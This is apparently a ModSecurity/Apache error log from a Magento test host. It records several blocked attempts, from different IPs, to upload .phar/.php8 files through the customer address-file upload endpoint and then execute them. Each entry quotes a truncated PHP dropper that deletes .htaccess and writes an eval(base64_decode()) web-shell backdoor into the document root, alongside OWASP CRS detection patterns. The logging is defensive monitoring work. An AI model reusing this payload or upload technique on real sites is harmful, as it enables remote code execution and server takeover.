[Wed Dec 03 08:07:41.803650 2025] [:error] [pid 489823] [client 37.112.223.135:50350] [client 37.112.223.135] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aS_hvcyqeBDXRsKLZ9YijwAAAAc"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/l/0/l088364f428d25.phar
[Wed Dec 03 08:07:42.069396 2025] [:error] [pid 489823] [client 37.112.223.135:50350] [client 37.112.223.135] ModSecurity: Rule 7f868e964be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/l/0/l088364f428d25.php8"] [unique_id "aS_hvsyqeBDXRsKLZ9YikAAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 03 08:07:42.069938 2025] [:error] [pid 489823] [client 37.112.223.135:50350] [client 37.112.223.135] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/l/0/l088364f428d25.php8"] [unique_id "aS_hvsyqeBDXRsKLZ9YikAAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 03 08:07:42.072823 2025] [:error] [pid 489823] [client 37.112.223.135:50350] [client 37.112.223.135] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/l/0/l088364f428d25.php8"] [unique_id "aS_hvsyqeBDXRsKLZ9YikAAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 03 08:07:42.073038 2025] [:error] [pid 489823] [client 37.112.223.135:50350] [client 37.112.223.135] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/l/0/l088364f428d25.php8"] [unique_id "aS_hvsyqeBDXRsKLZ9YikAAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Dec 04 02:17:30.169053 2025] [:error] [pid 505354] [client 144.124.225.151:46618] [client 144.124.225.151] ModSecurity: Rule 7f868ee3abe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/i/zi88364f428d25.phar"] [unique_id "aTDhKvwmBiqQuPTi_L4zCwAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Dec 04 02:17:30.169666 2025] [:error] [pid 505354] [client 144.124.225.151:46618] [client 144.124.225.151] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/i/zi88364f428d25.phar"] [unique_id "aTDhKvwmBiqQuPTi_L4zCwAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Dec 04 02:17:30.172618 2025] [:error] [pid 505354] [client 144.124.225.151:46618] [client 144.124.225.151] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/i/zi88364f428d25.phar"] [unique_id "aTDhKvwmBiqQuPTi_L4zCwAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Dec 04 02:17:30.172858 2025] [:error] [pid 505354] [client 144.124.225.151:46618] [client 144.124.225.151] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/i/zi88364f428d25.phar"] [unique_id "aTDhKvwmBiqQuPTi_L4zCwAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Dec 04 02:17:31.373708 2025] [:error] [pid 505354] [client 144.124.225.151:46618] [client 144.124.225.151] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: zi88364f428d25.php8 found within FILES:custom_attributes[country_id]: zi88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTDhK_wmBiqQuPTi_L4zDAAAAAQ"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/z/i/zi88364f428d25.phar
[Thu Dec 04 02:17:31.374459 2025] [:error] [pid 505354] [client 144.124.225.151:46618] [client 144.124.225.151] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTDhK_wmBiqQuPTi_L4zDAAAAAQ"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/z/i/zi88364f428d25.phar
[Thu Dec 04 02:17:31.374655 2025] [:error] [pid 505354] [client 144.124.225.151:46618] [client 144.124.225.151] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTDhK_wmBiqQuPTi_L4zDAAAAAQ"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/z/i/zi88364f428d25.phar
[Thu Dec 04 02:17:31.554728 2025] [:error] [pid 505354] [client 144.124.225.151:46618] [client 144.124.225.151] ModSecurity: Rule 7f868ee3abe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/i/zi88364f428d25.php8"] [unique_id "aTDhK_wmBiqQuPTi_L4zDQAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Dec 04 02:17:31.555211 2025] [:error] [pid 505354] [client 144.124.225.151:46618] [client 144.124.225.151] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/i/zi88364f428d25.php8"] [unique_id "aTDhK_wmBiqQuPTi_L4zDQAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Dec 04 02:17:31.557744 2025] [:error] [pid 505354] [client 144.124.225.151:46618] [client 144.124.225.151] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/i/zi88364f428d25.php8"] [unique_id "aTDhK_wmBiqQuPTi_L4zDQAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Dec 04 02:17:31.557973 2025] [:error] [pid 505354] [client 144.124.225.151:46618] [client 144.124.225.151] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/i/zi88364f428d25.php8"] [unique_id "aTDhK_wmBiqQuPTi_L4zDQAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Dec 04 19:47:14.950930 2025] [:error] [pid 508329] [client 185.65.202.110:45902] [client 185.65.202.110] ModSecurity: Rule 7fc9117afbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/8/x/8x88364f428d25.phar"] [unique_id "aTHXMs5FQ1QDStGSlQIH5wAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Dec 04 19:47:14.951677 2025] [:error] [pid 508329] [client 185.65.202.110:45902] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/8/x/8x88364f428d25.phar"] [unique_id "aTHXMs5FQ1QDStGSlQIH5wAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Dec 04 19:47:14.955005 2025] [:error] [pid 508329] [client 185.65.202.110:45902] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/8/x/8x88364f428d25.phar"] [unique_id "aTHXMs5FQ1QDStGSlQIH5wAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Dec 04 19:47:14.955296 2025] [:error] [pid 508329] [client 185.65.202.110:45902] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/8/x/8x88364f428d25.phar"] [unique_id "aTHXMs5FQ1QDStGSlQIH5wAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Dec 04 19:47:15.150763 2025] [:error] [pid 508329] [client 185.65.202.110:45902] [client 185.65.202.110] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: 8x88364f428d25.php8 found within FILES:custom_attributes[country_id]: 8x88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTHXM85FQ1QDStGSlQIH6AAAAAk"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/8/x/8x88364f428d25.phar
[Thu Dec 04 19:47:15.152426 2025] [:error] [pid 508329] [client 185.65.202.110:45902] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTHXM85FQ1QDStGSlQIH6AAAAAk"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/8/x/8x88364f428d25.phar
[Thu Dec 04 19:47:15.152655 2025] [:error] [pid 508329] [client 185.65.202.110:45902] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTHXM85FQ1QDStGSlQIH6AAAAAk"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/8/x/8x88364f428d25.phar
[Thu Dec 04 19:47:15.318202 2025] [:error] [pid 508329] [client 185.65.202.110:45902] [client 185.65.202.110] ModSecurity: Rule 7fc9117afbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/8/x/8x88364f428d25.php8"] [unique_id "aTHXM85FQ1QDStGSlQIH6QAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Dec 04 19:47:15.318865 2025] [:error] [pid 508329] [client 185.65.202.110:45902] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/8/x/8x88364f428d25.php8"] [unique_id "aTHXM85FQ1QDStGSlQIH6QAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Dec 04 19:47:15.321626 2025] [:error] [pid 508329] [client 185.65.202.110:45902] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/8/x/8x88364f428d25.php8"] [unique_id "aTHXM85FQ1QDStGSlQIH6QAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Dec 04 19:47:15.321861 2025] [:error] [pid 508329] [client 185.65.202.110:45902] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/8/x/8x88364f428d25.php8"] [unique_id "aTHXM85FQ1QDStGSlQIH6QAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Dec 05 12:51:25.602017 2025] [:error] [pid 535953] [client 194.110.207.198:37922] [client 194.110.207.198] ModSecurity: Rule 7f006a381be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/u/r/ur88364f428d25.phar"] [unique_id "aTLHPagsQbwbUi5XSBYKvAAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Dec 05 12:51:25.602575 2025] [:error] [pid 535953] [client 194.110.207.198:37922] [client 194.110.207.198] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/u/r/ur88364f428d25.phar"] [unique_id "aTLHPagsQbwbUi5XSBYKvAAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Dec 05 12:51:25.605241 2025] [:error] [pid 535953] [client 194.110.207.198:37922] [client 194.110.207.198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/u/r/ur88364f428d25.phar"] [unique_id "aTLHPagsQbwbUi5XSBYKvAAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Dec 05 12:51:25.605460 2025] [:error] [pid 535953] [client 194.110.207.198:37922] [client 194.110.207.198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/u/r/ur88364f428d25.phar"] [unique_id "aTLHPagsQbwbUi5XSBYKvAAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
